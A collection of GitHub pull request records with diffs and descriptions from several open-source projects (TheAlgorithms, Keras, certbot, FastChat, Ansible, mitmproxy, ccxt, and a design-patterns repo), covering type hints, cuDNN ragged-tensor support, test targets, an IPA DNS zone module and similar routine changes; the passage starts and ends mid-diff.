# https://www.tutorialspoint.com/python3/bitwise_operators_example.htm
-def binary_xor(a: int, b: int):
+def binary_xor(a: int, b: int) -> str:
"""
Take in 2 integers, convert them to binary,
return a binary number that is the
diff --git a/bit_manipulation/single_bit_manipulation_operations.py b/bit_manipulation/single_bit_manipulation_operations.py
index 114eafe3235b..e4a54028d9ee 100644
--- a/bit_manipulation/single_bit_manipulation_operations.py
+++ b/bit_manipulation/single_bit_manipulation_operations.py
@@ -3,7 +3,7 @@
"""Provide the functionality to manipulate a single bit."""
-def set_bit(number: int, position: int):
+def set_bit(number: int, position: int) -> int:
"""
Set the bit at position to 1.
@@ -21,7 +21,7 @@ def set_bit(number: int, position: int):
return number | (1 << position)
-def clear_bit(number: int, position: int):
+def clear_bit(number: int, position: int) -> int:
"""
Set the bit at position to 0.
@@ -37,7 +37,7 @@ def clear_bit(number: int, position: int):
return number & ~(1 << position)
-def flip_bit(number: int, position: int):
+def flip_bit(number: int, position: int) -> int:
"""
Flip the bit at position.
|
```console
$ mypy --strict bit_manipulation/
Success: no issues found in 7 source files
```
Related Issue: #4052
### **Describe your change:**
* [ ] Add an algorithm?
* [x] Fix a bug or typo in an existing algorithm?
* [ ] Documentation change?
### **Checklist:**
* [x] I have read [CONTRIBUTING.md](https://github.com/TheAlgorithms/Python/blob/master/CONTRIBUTING.md).
* [x] This pull request is all my own work -- I have not plagiarized.
* [x] I know that pull requests will not be merged if they fail the automated tests.
* [x] This PR only changes one algorithm file. To ease review, please open separate PRs for separate algorithms.
* [ ] All new Python files are placed inside an existing directory.
* [ ] All filenames are in all lowercase characters with no spaces or dashes.
* [ ] All functions and variable names follow Python naming conventions.
* [x] All function parameters and return values are annotated with Python [type hints](https://docs.python.org/3/library/typing.html).
* [ ] All functions have [doctests](https://docs.python.org/3/library/doctest.html) that pass the automated testing.
* [ ] All new algorithms have a URL in its comments that points to Wikipedia or other similar explanation.
* [ ] If this pull request resolves one or more open issues then the commit message contains `Fixes: #{$ISSUE_NO}`.
|
https://api.github.com/repos/TheAlgorithms/Python/pulls/4056
|
2020-12-24T10:54:15Z
|
2020-12-24T12:46:45Z
|
2020-12-24T12:46:44Z
|
2020-12-25T08:03:31Z
| 732
|
TheAlgorithms/Python
| 30,097
|
Cherrypick: Compute LSTM and GRU via cuDNN for RaggedTensors.
|
diff --git a/keras/layers/recurrent_v2.py b/keras/layers/recurrent_v2.py
index 231a4281377..d422c4c9845 100644
--- a/keras/layers/recurrent_v2.py
+++ b/keras/layers/recurrent_v2.py
@@ -421,9 +421,7 @@ def call(self, inputs, mask=None, training=None, initial_state=None):
input_shape = backend.int_shape(inputs)
timesteps = input_shape[0] if self.time_major else input_shape[1]
- # TODO(b/156447398) Investigate why the cuDNN kernel fails with ragged
- # inputs.
- if is_ragged_input or not self._could_use_gpu_kernel:
+ if not self._could_use_gpu_kernel:
kwargs = {'training': training}
self._maybe_reset_cell_dropout_mask(self.cell)
@@ -616,7 +614,10 @@ def step(cell_inputs, cell_states):
def gpu_gru(inputs, init_h, kernel, recurrent_kernel, bias, mask, time_major,
go_backwards, sequence_lengths):
"""GRU with cuDNN implementation which is only available for GPU."""
- if not time_major and mask is None:
+ if mask is not None:
+ sequence_lengths = calculate_sequence_by_mask(mask, time_major)
+
+ if not time_major and sequence_lengths is None:
inputs = tf.transpose(inputs, perm=(1, 0, 2))
seq_axis, batch_axis = (0, 1)
else:
@@ -649,9 +650,6 @@ def gpu_gru(inputs, init_h, kernel, recurrent_kernel, bias, mask, time_major,
shape=tf.constant([-1]),
transpose_weights=True)
- if mask is not None:
- sequence_lengths = calculate_sequence_by_mask(mask, time_major)
-
if sequence_lengths is not None:
if go_backwards:
# Three reversals are required. E.g.,
@@ -683,7 +681,7 @@ def gpu_gru(inputs, init_h, kernel, recurrent_kernel, bias, mask, time_major,
is_training=True, rnn_mode='gru')
last_output = outputs[-1]
- if not time_major and mask is None:
+ if not time_major and sequence_lengths is None:
outputs = tf.transpose(outputs, perm=[1, 0, 2])
h = tf.squeeze(h, axis=seq_axis)
@@ -693,7 +691,7 @@ def gpu_gru(inputs, init_h, kernel, recurrent_kernel, bias, mask, time_major,
# get the final effect output instead just 0s at the last timestep.
# In order to mimic the default keras behavior, we copy the final h state as
# the last_output, since it is numerically same as the output.
- if mask is not None:
+ if sequence_lengths is not None:
last_output = h
return last_output, outputs, h, _runtime(_RUNTIME_GPU)
@@ -1150,9 +1148,7 @@ def call(self, inputs, mask=None, training=None, initial_state=None):
input_shape = backend.int_shape(inputs)
timesteps = input_shape[0] if self.time_major else input_shape[1]
- # TODO(b/156447398) Investigate why the cuDNN kernel fails with ragged
- # inputs.
- if is_ragged_input or not self._could_use_gpu_kernel:
+ if not self._could_use_gpu_kernel:
# Fall back to use the normal LSTM.
kwargs = {'training': training}
self._maybe_reset_cell_dropout_mask(self.cell)
@@ -1434,7 +1430,10 @@ def gpu_lstm(inputs, init_h, init_c, kernel, recurrent_kernel, bias, mask,
runtime: Constant string tensor which indicate real runtime hardware. This
value is for testing purpose and should not be used by user.
"""
- if not time_major and mask is None:
+ if mask is not None:
+ sequence_lengths = calculate_sequence_by_mask(mask, time_major)
+
+ if not time_major and sequence_lengths is None:
inputs = tf.transpose(inputs, perm=(1, 0, 2))
seq_axis, batch_axis = (0, 1)
else:
@@ -1469,9 +1468,6 @@ def gpu_lstm(inputs, init_h, init_c, kernel, recurrent_kernel, bias, mask,
shape=tf.constant([-1]),
transpose_weights=True)
- if mask is not None:
- sequence_lengths = calculate_sequence_by_mask(mask, time_major)
-
if sequence_lengths is not None:
if go_backwards:
# Three reversals are required. E.g.,
@@ -1506,7 +1502,7 @@ def gpu_lstm(inputs, init_h, init_c, kernel, recurrent_kernel, bias, mask,
is_training=True, rnn_mode='lstm')
last_output = outputs[-1]
- if not time_major and mask is None:
+ if not time_major and sequence_lengths is None:
outputs = tf.transpose(outputs, perm=[1, 0, 2])
h = tf.squeeze(h, axis=seq_axis)
c = tf.squeeze(c, axis=seq_axis)
@@ -1517,7 +1513,7 @@ def gpu_lstm(inputs, init_h, init_c, kernel, recurrent_kernel, bias, mask,
# get the final effect output instead just 0s at the last timestep.
# In order to mimic the default keras behavior, we copy the final h state as
# the last_output, since it is numerically same as the output.
- if mask is not None:
+ if sequence_lengths is not None:
last_output = h
return last_output, outputs, h, c, _runtime(_RUNTIME_GPU)
diff --git a/keras/layers/recurrent_v2_test.py b/keras/layers/recurrent_v2_test.py
index 8e9c8f848bd..0e5750ec1ae 100644
--- a/keras/layers/recurrent_v2_test.py
+++ b/keras/layers/recurrent_v2_test.py
@@ -119,6 +119,31 @@ def test_ragged(self, layer):
lstm = layer(32)
lstm(embedded_inputs)
+ @parameterized.parameters([rnn_v2.LSTM, rnn_v2.GRU])
+ @testing_utils.run_v2_only
+ def test_compare_ragged_with_masks(self, layer):
+ vocab_size = 100
+ timestep = 20
+ units = 32
+ embedder = embeddings.Embedding(input_dim=vocab_size, output_dim=units)
+ layer = layer(units, return_sequences=True)
+ data = tf.constant(
+ np.random.RandomState(0).randint(0, vocab_size, [timestep, timestep]))
+ mask = tf.sequence_mask(tf.range(1, timestep + 1))
+ data_ragged = tf.ragged.boolean_mask(data, mask)
+
+ outputs = []
+ devices = [testing_utils.device(should_use_gpu=False)]
+ if tf.test.is_gpu_available():
+ devices.append(testing_utils.device(should_use_gpu=True))
+ for device in devices:
+ with device:
+ outputs.append(tf.boolean_mask(layer(embedder(data), mask=mask), mask))
+ outputs.append(layer(embedder(data_ragged)).values)
+
+ for i in range(len(outputs) - 1):
+ self.assertAllClose(outputs[i], outputs[i + 1], atol=1e-4)
+
if __name__ == '__main__':
tf.test.main()
|
Would you be open to cherry-picking #15756 for r2.8?
## Pros
- This cherry-picked commit fixes a bug that prevented computing LSTM and GRU for RaggedTensors via cuDNN, resulting in a large speedup on a GPU (easily 10 times, as measured in https://github.com/keras-team/keras/pull/15756#issuecomment-999958522). Ragged tensors with RNNs are quite a common use case in my opinion, so quite a lot of users will benefit, I believe (a minimal usage sketch follows this list).
- The patch does not add new functionality; it only makes correct use of an existing cuDNN implementation that is already used for masked tensors. A test comparing RaggedTensors+RNNs versus masked Tensors+RNNs is provided.
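A hypothetical minimal usage sketch (not taken from the test suite; layer sizes are illustrative). With this fix, a ragged batch like the one below is routed to the cuDNN kernel when a GPU is available instead of falling back to the generic, much slower RNN loop:
```python
import tensorflow as tf

# A ragged batch of token ids with rows of different lengths.
ragged = tf.ragged.constant([[3, 1, 4, 1], [5, 9]])

embedded = tf.keras.layers.Embedding(input_dim=100, output_dim=32)(ragged)
outputs = tf.keras.layers.LSTM(32, return_sequences=True)(embedded)
```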
Thanks for consideration.
|
https://api.github.com/repos/keras-team/keras/pulls/15862
|
2022-01-06T00:07:58Z
|
2022-01-06T18:16:11Z
|
2022-01-06T18:16:11Z
|
2022-01-06T18:16:14Z
| 1,683
|
keras-team/keras
| 47,066
|
Switch to the Debian Buster ARM image
|
diff --git a/tests/letstest/apache2_targets.yaml b/tests/letstest/apache2_targets.yaml
index d584705ca94..2fa64568c47 100644
--- a/tests/letstest/apache2_targets.yaml
+++ b/tests/letstest/apache2_targets.yaml
@@ -8,12 +8,6 @@ targets:
type: ubuntu
virt: hvm
user: ubuntu
- - ami: ami-008680ee60f23c94b
- name: ubuntu20.04_arm64
- type: ubuntu
- virt: hvm
- user: ubuntu
- machine_type: a1.medium
- ami: ami-0545f7036167eb3aa
name: ubuntu19.10
type: ubuntu
@@ -36,6 +30,12 @@ targets:
type: ubuntu
virt: hvm
user: admin
+ - ami: ami-0dcd54b7d2fff584f
+ name: debian10_arm64
+ type: ubuntu
+ virt: hvm
+ user: admin
+ machine_type: a1.medium
- ami: ami-003f19e0e687de1cd
name: debian9
type: ubuntu
diff --git a/tests/letstest/scripts/test_apache2.sh b/tests/letstest/scripts/test_apache2.sh
index e39cee9ef5f..ba3d9437920 100755
--- a/tests/letstest/scripts/test_apache2.sh
+++ b/tests/letstest/scripts/test_apache2.sh
@@ -12,7 +12,7 @@ then
# For apache 2.4, set up ServerName
sudo sed -i '/ServerName/ s/#ServerName/ServerName/' $CONFFILE
sudo sed -i '/ServerName/ s/www.example.com/'$PUBLIC_HOSTNAME'/' $CONFFILE
- if [ $(python3 -V 2>&1 | cut -d" " -f 2 | cut -d. -f1,2 | sed 's/\.//') -ne 38 ]
+ if [ $(python3 -V 2>&1 | cut -d" " -f 2 | cut -d. -f1,2 | sed 's/\.//') -lt 36 ]
then
# Upgrade python version using pyenv because py3.5 is deprecated
# Don't upgrade if it's already 3.8 because pyenv doesn't work great on arm, and
diff --git a/tests/letstest/targets.yaml b/tests/letstest/targets.yaml
index 7110534693e..f6d3dd42f28 100644
--- a/tests/letstest/targets.yaml
+++ b/tests/letstest/targets.yaml
@@ -8,12 +8,6 @@ targets:
type: ubuntu
virt: hvm
user: ubuntu
- - ami: ami-008680ee60f23c94b
- name: ubuntu20.04_arm64
- type: ubuntu
- virt: hvm
- user: ubuntu
- machine_type: a1.medium
- ami: ami-0545f7036167eb3aa
name: ubuntu19.10
type: ubuntu
@@ -31,6 +25,12 @@ targets:
type: ubuntu
virt: hvm
user: admin
+ - ami: ami-0dcd54b7d2fff584f
+ name: debian10_arm64
+ type: ubuntu
+ virt: hvm
+ user: admin
+ machine_type: a1.medium
#-----------------------------------------------------------------------------
# Other Redhat Distros
- ami: ami-0916c408cb02e310b
|
Fixes https://github.com/certbot/certbot/issues/8220.
I took the AMI from https://wiki.debian.org/Cloud/AmazonEC2Image/Buster.
You can see the affected test farm tests passing with this change at https://dev.azure.com/certbot/certbot/_build/results?buildId=2560&view=results.
|
https://api.github.com/repos/certbot/certbot/pulls/8234
|
2020-08-26T00:06:47Z
|
2020-08-26T21:04:38Z
|
2020-08-26T21:04:38Z
|
2020-08-26T21:04:41Z
| 864
|
certbot/certbot
| 2,289
|
add ability for workers to advertise multiple model names
|
diff --git a/fastchat/serve/model_worker.py b/fastchat/serve/model_worker.py
index 8f9c2fa625..3e232ff808 100644
--- a/fastchat/serve/model_worker.py
+++ b/fastchat/serve/model_worker.py
@@ -63,7 +63,7 @@ def __init__(
worker_id,
no_register,
model_path,
- model_name,
+ model_names,
device,
num_gpus,
max_gpu_memory,
@@ -75,10 +75,10 @@ def __init__(
self.worker_id = worker_id
if model_path.endswith("/"):
model_path = model_path[:-1]
- self.model_name = model_name or model_path.split("/")[-1]
+ self.model_names = model_names or [model_path.split("/")[-1]]
self.device = device
- logger.info(f"Loading the model {self.model_name} on worker {worker_id} ...")
+ logger.info(f"Loading the model {self.model_names} on worker {worker_id} ...")
self.model, self.tokenizer = load_model(
model_path, device, num_gpus, max_gpu_memory, load_8bit, cpu_offloading
)
@@ -120,7 +120,7 @@ def register_to_controller(self):
def send_heart_beat(self):
logger.info(
- f"Send heart beat. Models: {[self.model_name]}. "
+ f"Send heart beat. Models: {[self.model_names]}. "
f"Semaphore: {pretty_print_semaphore(model_semaphore)}. "
f"global_counter: {global_counter}"
)
@@ -162,7 +162,7 @@ def get_queue_length(self):
def get_status(self):
return {
- "model_names": [self.model_name],
+ "model_names": self.model_names,
"speed": 1,
"queue_length": self.get_queue_length(),
}
@@ -397,7 +397,7 @@ async def model_details(request: Request):
"--controller-address", type=str, default="http://localhost:21001"
)
add_model_args(parser)
- parser.add_argument("--model-name", type=str, help="Optional display name")
+ parser.add_argument("--model-names", type=lambda s: s.split(','), help="Optional display comma separated names")
parser.add_argument("--limit-model-concurrency", type=int, default=5)
parser.add_argument("--stream-interval", type=int, default=2)
parser.add_argument("--no-register", action="store_true")
@@ -410,14 +410,14 @@ async def model_details(request: Request):
f"Larger --num-gpus ({args.num_gpus}) than --gpus {args.gpus}!"
)
os.environ["CUDA_VISIBLE_DEVICES"] = args.gpus
-
+
worker = ModelWorker(
args.controller_address,
args.worker_address,
worker_id,
args.no_register,
args.model_path,
- args.model_name,
+ args.model_names,
args.device,
args.num_gpus,
args.max_gpu_memory,
|
FastChat has the ability to perform chat, completion, and embedding.
However, workers are only able to advertise a single model name, which limits its functionality.
This PR adds the ability for workers to advertise multiple model names at the same time, e.g.
```sh
python3 -m fastchat.serve.model_worker \
--model-path /path/to/model/weights \
--model-names "gpt-4,text-davinci-003,text-embedding-ada-002"
```
This will allow a single worker to perform chat, completion, and embedding.
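A minimal sketch of how the new `--model-names` value is parsed (the argparse `type` lambda from the diff turns the comma separated string into a list):
```python
import argparse

parser = argparse.ArgumentParser()
# Same parsing as added in model_worker.py: split the comma separated string.
parser.add_argument("--model-names", type=lambda s: s.split(","))

args = parser.parse_args(
    ["--model-names", "gpt-4,text-davinci-003,text-embedding-ada-002"]
)
assert args.model_names == ["gpt-4", "text-davinci-003", "text-embedding-ada-002"]
```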
|
https://api.github.com/repos/lm-sys/FastChat/pulls/1517
|
2023-05-27T13:28:58Z
|
2023-06-09T01:25:30Z
|
2023-06-09T01:25:30Z
|
2023-07-11T18:21:22Z
| 671
|
lm-sys/FastChat
| 41,037
|
fix #781
|
diff --git a/letsencrypt-apache/letsencrypt_apache/parser.py b/letsencrypt-apache/letsencrypt_apache/parser.py
index d7dc3c42254..823d9794bec 100644
--- a/letsencrypt-apache/letsencrypt_apache/parser.py
+++ b/letsencrypt-apache/letsencrypt_apache/parser.py
@@ -394,6 +394,8 @@ def _get_include_path(self, arg):
if not arg.startswith("/"):
# Normpath will condense ../
arg = os.path.normpath(os.path.join(self.root, arg))
+ else:
+ arg = os.path.normpath(arg)
# Attempts to add a transform to the file if one does not already exist
if os.path.isdir(arg):
diff --git a/letsencrypt-apache/letsencrypt_apache/tests/complex_parsing_test.py b/letsencrypt-apache/letsencrypt_apache/tests/complex_parsing_test.py
index e7bd03cc51a..64ecaa3219f 100644
--- a/letsencrypt-apache/letsencrypt_apache/tests/complex_parsing_test.py
+++ b/letsencrypt-apache/letsencrypt_apache/tests/complex_parsing_test.py
@@ -98,6 +98,9 @@ def test_include_complex(self):
def test_include_fullpath(self):
self.verify_fnmatch(os.path.join(self.config_path, "test_fnmatch.conf"))
+ def test_include_fullpath_trailing_slash(self):
+ self.verify_fnmatch(self.config_path + "//")
+
def test_include_variable(self):
self.verify_fnmatch("../complex_parsing/${fnmatch_filename}")
|
(Addresses #781) Realized I wasn't normalizing the path when the full path was specified.
(Apache will normalize the path for you)
I added a unittest to test this case.
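As a quick illustration (the path is hypothetical, not from the test suite), `os.path.normpath` is what collapses doubled and trailing slashes for absolute Include arguments:
```python
import os.path

# A full path with doubled/trailing slashes, as Apache would accept it.
arg = "/etc/apache2/sites-enabled//"

# normpath condenses the separators (on a POSIX system), matching the
# normalization Apache applies itself.
assert os.path.normpath(arg) == "/etc/apache2/sites-enabled"
```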
|
https://api.github.com/repos/certbot/certbot/pulls/782
|
2015-09-17T09:17:20Z
|
2015-09-17T18:17:18Z
|
2015-09-17T18:17:18Z
|
2016-05-06T19:22:13Z
| 358
|
certbot/certbot
| 3,457
|
Adds ipa_dnszone module
|
diff --git a/lib/ansible/modules/identity/ipa/ipa_dnszone.py b/lib/ansible/modules/identity/ipa/ipa_dnszone.py
new file mode 100644
index 00000000000000..a5d9bcb442c85a
--- /dev/null
+++ b/lib/ansible/modules/identity/ipa/ipa_dnszone.py
@@ -0,0 +1,182 @@
+#!/usr/bin/python
+# -*- coding: utf-8 -*-
+# Copyright: (c) 2017, Fran Fitzpatrick ([email protected])
+# Borrowed heavily from other work by Abhijeet Kasurde ([email protected])
+# GNU General Public License v3.0+ (see COPYING or https://www.gnu.org/licenses/gpl-3.0.txt)
+
+from __future__ import absolute_import, division, print_function
+__metaclass__ = type
+
+ANSIBLE_METADATA = {'metadata_version': '1.1',
+ 'status': ['preview'],
+ 'supported_by': 'community'}
+
+
+DOCUMENTATION = '''
+---
+module: ipa_dnszone
+author: Fran Fitzpatrick (@fxfitz)
+short_description: Manage FreeIPA DNS Zones
+description:
+- Add and delete an IPA DNS Zones using IPA API
+options:
+ zone_name:
+ description:
+ - The DNS zone name to which needs to be managed.
+ required: true
+ state:
+ description: State to ensure
+ required: false
+ default: present
+ choices: ["present", "absent"]
+ ipa_port:
+ description: Port of IPA server
+ required: false
+ default: 443
+ ipa_host:
+ description: IP or hostname of IPA server
+ required: false
+ default: localhost
+ ipa_user:
+ description: Administrative account used on IPA server
+ required: false
+ default: admin
+ ipa_pass:
+ description: Password of administrative user
+ required: true
+ ipa_prot:
+ description: Protocol used by IPA server
+ required: false
+ default: https
+ choices: ["http", "https"]
+ validate_certs:
+ description:
+ - This only applies if C(ipa_prot) is I(https).
+ - If set to C(no), the SSL certificates will not be validated.
+ - This should only set to C(no) used on personally controlled sites using self-signed certificates.
+ required: false
+ default: true
+version_added: "2.5"
+'''
+
+EXAMPLES = '''
+# Ensure dns zone is present
+- ipa_dnsrecord:
+ ipa_host: spider.example.com
+ ipa_pass: Passw0rd!
+ state: present
+ zone_name: example.com
+
+# Ensure that dns zone is removed
+- ipa_dnszone:
+ zone_name: example.com
+ ipa_host: localhost
+ ipa_user: admin
+ ipa_pass: topsecret
+ state: absent
+'''
+
+RETURN = '''
+zone:
+ description: DNS zone as returned by IPA API.
+ returned: always
+ type: dict
+'''
+
+from ansible.module_utils.basic import AnsibleModule
+from ansible.module_utils.ipa import IPAClient
+from ansible.module_utils._text import to_native
+
+
+class DNSZoneIPAClient(IPAClient):
+ def __init__(self, module, host, port, protocol):
+ super(DNSZoneIPAClient, self).__init__(module, host, port, protocol)
+
+ def dnszone_find(self, zone_name):
+ return self._post_json(
+ method='dnszone_find',
+ name=zone_name,
+ item={'idnsname': zone_name}
+ )
+
+ def dnszone_add(self, zone_name=None, details=None):
+ return self._post_json(
+ method='dnszone_add',
+ name=zone_name,
+ item={}
+ )
+
+ def dnszone_del(self, zone_name=None, record_name=None, details=None):
+ return self._post_json(
+ method='dnszone_del', name=zone_name, item={})
+
+
+def ensure(module, client):
+ zone_name = module.params['zone_name']
+ state = module.params['state']
+
+ ipa_dnszone = client.dnszone_find(zone_name)
+
+ changed = False
+ if state == 'present':
+ if not ipa_dnszone:
+ changed = True
+ if not module.check_mode:
+ client.dnszone_add(zone_name=zone_name)
+ else:
+ changed = False
+ else:
+ if ipa_dnszone:
+ changed = True
+ if not module.check_mode:
+ client.dnszone_del(zone_name=zone_name)
+
+ return changed, client.dnszone_find(zone_name)
+
+
+def main():
+ module = AnsibleModule(
+ argument_spec=dict(
+ zone_name=dict(type='str', required=True),
+ ipa_prot=dict(
+ type='str',
+ default='https',
+ choices=['http', 'https']
+ ),
+ ipa_host=dict(
+ type='str',
+ default='localhost'
+ ),
+ state=dict(
+ type='str',
+ default='present',
+ choices=['present', 'absent']
+ ),
+ ipa_port=dict(type='int', default=443),
+ ipa_user=dict(type='str', default='admin'),
+ ipa_pass=dict(type='str', required=True, no_log=True),
+ validate_certs=dict(type='bool', default=True),
+ ),
+ supports_check_mode=True,
+ )
+
+ client = DNSZoneIPAClient(
+ module=module,
+ host=module.params['ipa_host'],
+ port=module.params['ipa_port'],
+ protocol=module.params['ipa_prot']
+ )
+
+ try:
+ client.login(
+ username=module.params['ipa_user'],
+ password=module.params['ipa_pass']
+ )
+ changed, zone = ensure(module, client)
+ module.exit_json(changed=changed, zone=zone)
+ except Exception as e:
+ module.fail_json(msg=to_native(e))
+
+
+if __name__ == '__main__':
+ main()
|
##### SUMMARY
This PR adds an ipa_dnszone module.
Fixes #28789
##### ISSUE TYPE
<!--- Pick one below and delete the rest: -->
- New Module Pull Request
##### COMPONENT NAME
<!--- Name of the module/plugin/module/task -->
##### ANSIBLE VERSION
<!--- Paste verbatim output from “ansible --version” between quotes below -->
```
$ ansible --version
ansible 2.3.1.0
config file = /Users/fxfitz/dev/cyclops-ansible/ansible.cfg
configured module search path = Default w/o overrides
python version = 2.7.13 (default, May 18 2017, 22:52:22) [GCC 4.2.1 Compatible Apple LLVM 8.1.0 (clang-802.0.42)]
```
##### ADDITIONAL INFORMATION
We did not have an ipa_dnszone module, so here's one! Borrowed a lot from @Akasurde's work (thanks! it made this much easier).
|
https://api.github.com/repos/ansible/ansible/pulls/28790
|
2017-08-29T18:02:32Z
|
2017-09-27T07:05:00Z
|
2017-09-27T07:05:00Z
|
2019-04-26T22:24:26Z
| 1,443
|
ansible/ansible
| 49,288
|
fix #3780
|
diff --git a/mitmproxy/proxy/protocol/http2.py b/mitmproxy/proxy/protocol/http2.py
index a5870e6c8e..89e652e3d9 100644
--- a/mitmproxy/proxy/protocol/http2.py
+++ b/mitmproxy/proxy/protocol/http2.py
@@ -87,6 +87,18 @@ class Http2Layer(base.Layer):
# mypy type hints
client_conn: connections.ClientConnection = None
+ class H2ConnLogger:
+ def __init__(self, name, log):
+ self.name = name
+ self.log = log
+
+ def debug(self, fmtstr, *args):
+ msg = "H2Conn {}: {}".format(self.name, fmtstr % args)
+ self.log(msg, "debug")
+
+ def trace(self, fmtstr, *args):
+ pass
+
def __init__(self, ctx, mode: str) -> None:
super().__init__(ctx)
self.mode = mode
@@ -98,7 +110,8 @@ def __init__(self, ctx, mode: str) -> None:
client_side=False,
header_encoding=False,
validate_outbound_headers=False,
- validate_inbound_headers=False)
+ validate_inbound_headers=False,
+ logger=self.H2ConnLogger("client", self.log))
self.connections[self.client_conn] = SafeH2Connection(self.client_conn, config=config)
def _initiate_server_conn(self):
@@ -107,7 +120,8 @@ def _initiate_server_conn(self):
client_side=True,
header_encoding=False,
validate_outbound_headers=False,
- validate_inbound_headers=False)
+ validate_inbound_headers=False,
+ logger=self.H2ConnLogger("server", self.log))
self.connections[self.server_conn] = SafeH2Connection(self.server_conn, config=config)
self.connections[self.server_conn].initiate_connection()
self.server_conn.send(self.connections[self.server_conn].data_to_send())
@@ -195,10 +209,12 @@ def _handle_data_received(self, eid, event, source_conn):
else:
self.streams[eid].data_queue.put(event.data)
self.streams[eid].queued_data_length += len(event.data)
- self.connections[source_conn].safe_acknowledge_received_data(
- event.flow_controlled_length,
- event.stream_id
- )
+
+ # always acknowledge received data with a WINDOW_UPDATE frame
+ self.connections[source_conn].safe_acknowledge_received_data(
+ event.flow_controlled_length,
+ event.stream_id
+ )
return True
def _handle_stream_ended(self, eid):
@@ -461,7 +477,7 @@ def raise_zombie(self, pre_command=None): # pragma: no cover
if self.zombie is not None or connection_closed:
if pre_command is not None:
pre_command()
- raise exceptions.Http2ZombieException("Connection already dead")
+ raise exceptions.Http2ZombieException("Connection or stream already dead: {}, {}".format(self.zombie, connection_closed))
@detect_zombie_stream
def read_request_headers(self, flow):
@@ -643,7 +659,8 @@ def run(self):
try:
layer()
except exceptions.Http2ZombieException: # pragma: no cover
- pass
+ # zombies can be safely terminated - no need to kill them twice
+ return
except exceptions.ProtocolException as e: # pragma: no cover
self.log(repr(e), "info")
except exceptions.SetServerNotAllowedException as e: # pragma: no cover
diff --git a/setup.py b/setup.py
index 690a433a18..c5edee18c8 100644
--- a/setup.py
+++ b/setup.py
@@ -68,7 +68,7 @@
"click>=7.0,<8",
"cryptography>=2.1.4,<2.5",
"flask>=1.1.1,<1.2",
- "h2>=3.0.1,<4",
+ "h2>=3.2.0,<4",
"hyperframe>=5.1.0,<6",
"kaitaistruct>=0.7,<0.9",
"ldap3>=2.6.1,<2.7",
|
The main fix is bumping the hyper-h2 dependency.
The rest of the changes are just additional debug enhancements.
fixes #3780
|
https://api.github.com/repos/mitmproxy/mitmproxy/pulls/3815
|
2020-02-09T10:08:53Z
|
2020-02-09T12:28:39Z
|
2020-02-09T12:28:39Z
|
2020-02-09T12:28:44Z
| 957
|
mitmproxy/mitmproxy
| 28,208
|
feat(huobi) - pair create time
|
diff --git a/build/transpile.js b/build/transpile.js
index 08290c44d8d0..2f424bb20d5b 100644
--- a/build/transpile.js
+++ b/build/transpile.js
@@ -294,6 +294,7 @@ class Transpiler {
[ /\.fetchPaginatedCallDeterministic\s/g, '.fetch_paginated_call_deterministic'],
[ /\.fetchPaginatedCallCursor\s/g, '.fetch_paginated_call_cursor'],
[ /\.removeRepeatedElementsFromArray\s/g, '.remove_repeated_elements_from_array'],
+ [ /\.stringToCharsArray\s/g, '.string_to_chars_array'],
[ /\.handleUntilOption\s/g, '.handle_until_option'],
[ /\ssha(1|256|384|512)([,)])/g, ' \'sha$1\'$2'], // from js imports to this
[ /\s(md5|secp256k1|ed25519|keccak)([,)])/g, ' \'$1\'$2'], // from js imports to this
diff --git a/php/Exchange.php b/php/Exchange.php
index f1f620e45503..02f00334880e 100644
--- a/php/Exchange.php
+++ b/php/Exchange.php
@@ -2063,6 +2063,10 @@ function parse_to_big_int($value) {
return intval($value);
}
+ public function string_to_chars_array ($value) {
+ return str_split($value);
+ }
+
function valueIsDefined($value){
return isset($value) && !is_null($value);
}
diff --git a/python/ccxt/base/exchange.py b/python/ccxt/base/exchange.py
index 8b294731693e..4baa8d92695f 100644
--- a/python/ccxt/base/exchange.py
+++ b/python/ccxt/base/exchange.py
@@ -1649,6 +1649,9 @@ def clone(self, obj):
def convert_to_big_int(self, value):
return int(value) if isinstance(value, str) else value
+ def string_to_chars_array(self, value):
+ return list(value)
+
def valueIsDefined(self, value):
return value is not None
diff --git a/ts/src/base/Exchange.ts b/ts/src/base/Exchange.ts
index b07a077fee0f..dbcdf24e6feb 100644
--- a/ts/src/base/Exchange.ts
+++ b/ts/src/base/Exchange.ts
@@ -1316,6 +1316,10 @@ export default class Exchange {
return BigInt(value); // used on XT
}
+ stringToCharsArray (value) {
+ return value.split ('');
+ }
+
valueIsDefined(value){
return value !== undefined && value !== null;
}
diff --git a/ts/src/huobi.ts b/ts/src/huobi.ts
index 82f62c2f3f41..56efa6e34ffd 100644
--- a/ts/src/huobi.ts
+++ b/ts/src/huobi.ts
@@ -1699,6 +1699,13 @@ export default class huobi extends Exchange {
// 7 Settlement Completed
// 8 Delivered
// 9 Suspending of Trade
+ let created = undefined;
+ let createdDate = this.safeString (market, 'create_date'); // i.e 20230101
+ if (createdDate !== undefined) {
+ const createdArray = this.stringToCharsArray (createdDate);
+ createdDate = createdArray[0] + createdArray[1] + createdArray[2] + createdArray[3] + '-' + createdArray[4] + createdArray[5] + '-' + createdArray[6] + createdArray[7] + ' 00:00:00';
+ created = this.parse8601 (createdDate);
+ }
result.push ({
'id': id,
'lowercaseId': lowercaseId,
@@ -1751,6 +1758,7 @@ export default class huobi extends Exchange {
'max': undefined,
},
},
+ 'created': created,
'info': market,
});
}
|
https://api.github.com/repos/ccxt/ccxt/pulls/19528
|
2023-10-11T20:04:01Z
|
2023-10-17T11:40:14Z
|
2023-10-17T11:40:14Z
|
2023-10-17T12:19:00Z
| 917
|
ccxt/ccxt
| 13,668
|
|
publish_subscribe pattern
|
diff --git a/README.md b/README.md
index 8fbcd799..318adc5f 100644
--- a/README.md
+++ b/README.md
@@ -31,4 +31,5 @@ Current Patterns:
* template
* command
* memento
-* visitor
\ No newline at end of file
+* visitor
+* publish_subscribe
\ No newline at end of file
diff --git a/publish_subscribe.py b/publish_subscribe.py
new file mode 100644
index 00000000..1219ff22
--- /dev/null
+++ b/publish_subscribe.py
@@ -0,0 +1,77 @@
+#!/usr/bin/env python
+
+'''
+Reference: http://www.slideshare.net/ishraqabd/publish-subscribe-model-overview-13368808
+Author: https://github.com/HanWenfang
+'''
+
+class Provider:
+ def __init__(self):
+ self.msgQueue = []
+ self.subscribers = {}
+
+ def notify(self, msg):
+ self.msgQueue.append(msg)
+
+ def subscribe(self,msg, subscriber):
+ if not msg in self.subscribers:
+ self.subscribers[msg] = []
+ self.subscribers[msg].append(subscriber) #unfair
+ else:
+ self.subscribers[msg].append(subscriber)
+
+ def unSubscribe(self,msg, subscriber):
+ self.subscribers[msg].remove(subscriber)
+
+ def update(self):
+ for msg in self.msgQueue:
+ if msg in self.subscribers:
